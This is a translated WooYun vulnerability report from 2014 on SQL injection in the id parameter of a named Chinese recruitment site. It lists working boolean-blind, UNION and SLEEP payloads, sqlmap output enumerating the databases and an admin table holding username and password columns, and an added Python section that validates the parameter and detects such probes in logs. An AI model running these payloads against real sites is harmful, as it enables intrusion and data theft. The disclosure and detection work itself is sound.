
Vulnerability summary

Defect ID: wooyun-2014-058877

Title: Zhongguancun Talent Network has a SQL injection vulnerability that can lead to sensitive information disclosure

Affected vendor: Zhongguancun Talent Network

Author: 金枪银矛小霸王

Submitted: 2014-04-29 16:10

Fix time: 2014-06-13 16:11

Published: 2014-06-13 16:11

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-04-29: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2014-06-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Zhongguancun Talent Network has a SQL injection vulnerability that can lead to sensitive information disclosure.

Detailed description:

Injection URL:

http://www.zgcrc.com.cn/aboutus/?id=17


Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=17 AND 7841=7841
Type: UNION query
Title: MySQL UNION query (NULL) - 38 columns
Payload: id=-5738 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a676e763a,0x56646476754d786f5957,0x3a7a66733a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=17 AND SLEEP(5)
---
[13:15:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0.11

available databases [10]:
[*] information_schema
[*] kh_zhaopin
[*] kh_zhaopin_20130920
[*] kh_zhaopin_20131024
[*] kh_zhaopin_20131026
[*] kh_zhaopin_data
[*] kh_zhaopin_data20130920
[*] kh_zhaopin_sqlserver
[*] mysql
[*] test

Database: kh_zhaopin_data
[79 tables]

I stopped at this point and did not dump any further.


Proof of vulnerability:

Database: kh_zhaopin_data
Table: admin
[11 columns]
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| biming | varchar(50) |
| chat | varchar(10) |
| easyset | varchar(1000) |
| id | int(10) |
| lx | int(10) |
| password | varchar(50) |
| quanxian | varchar(1000) |
| quanxian1 | varchar(1000) |
| roleIds | varchar(200) |
| username | varchar(20) |
| zhiwei | varchar(20) |
+-----------+---------------+

Fix recommendation:

Filter the parameter. A gift would be appreciated!
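As an added illustration of that fix (not the site's code or the author's), the Python below applies a strict integer allow-list to id before a bound-parameter lookup, and checks access-log lines for the three payload classes sqlmap reported (boolean-based blind, UNION query, time-based blind). The log lines, the SQLite table and the 203.0.113.5 address are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit
# Signatures for the three techniques sqlmap reported against id: boolean-based
# blind, UNION query, time-based blind. Kept narrow to limit false positives.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "union-query": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time-blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}
ID_OK = re.compile(r"[0-9]{1,10}")  # allow-list: id is a bare positive integer
REQUEST = re.compile(r'"GET (?P<target>\S+) HTTP/[\d.]+"')

def validate_id(raw):
    """The parameter filtering the fix recommends: anything but a bare integer
    (e.g. '17 AND 7841=7841', '-5738 UNION ...', '17 AND SLEEP(5)') is rejected."""
    return ID_OK.fullmatch(raw) is not None

def lookup_article(conn, raw_id):
    """Hardened lookup: validate, then bind the value instead of concatenating
    it into the SQL string. Returns the row or None."""
    if not validate_id(raw_id):
        return None
    return conn.execute("SELECT id, title FROM aboutus WHERE id = ?", (int(raw_id),)).fetchone()

def audit_log(text):
    """Per request carrying an id parameter, return (value, allowed, techniques)
    so rejected probes can also be alerted on from the access log."""
    findings = []
    for m in REQUEST.finditer(text):
        for value in parse_qs(urlsplit(m.group("target")).query).get("id", []):
            hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
            findings.append((value, validate_id(value), hits))
    return findings

def demo_db():
    """In-memory SQLite stand-in for the site's MySQL table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE aboutus (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO aboutus VALUES (17, 'About us')")
    return conn

# Constructed Apache-style log lines (203.0.113.5 is a documentation address);
# the three probes reuse the report's payloads, the UNION one shortened.
LOG = """\
203.0.113.5 - - [29/Apr/2014:13:15:59 +0800] "GET /aboutus/?id=17 HTTP/1.1" 200 5120
203.0.113.5 - - [29/Apr/2014:13:16:01 +0800] "GET /aboutus/?id=17%20AND%207841%3D7841 HTTP/1.1" 200 5120
203.0.113.5 - - [29/Apr/2014:13:16:02 +0800] "GET /aboutus/?id=-5738%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x3a676e763a,0x56646476754d786f5957,0x3a7a66733a),NULL%23 HTTP/1.1" 200 5311
203.0.113.5 - - [29/Apr/2014:13:16:08 +0800] "GET /aboutus/?id=17%20AND%20SLEEP(5) HTTP/1.1" 200 5120
"""
```

Running `audit_log(LOG)` flags the three probes and accepts the legitimate `id=17` request; the same `validate_id` check gates `lookup_article`, so a rejected value never reaches the database.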


+-------------------------Friendly notice----------------------------+
| ① I made no changes to the site and downloaded no files            |
| ② I did not carry out a DoS or any other traffic attack against the site |
| ③ I checked the site in good faith, found the vulnerability, and submitted it to the WooYun platform |
| ④ For any questions, please contact me through the WooYun platform, thank you |
+--------------------------------------------------------------------+

Copyright notice: please credit the source when reposting: 金枪银矛小霸王@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused to respond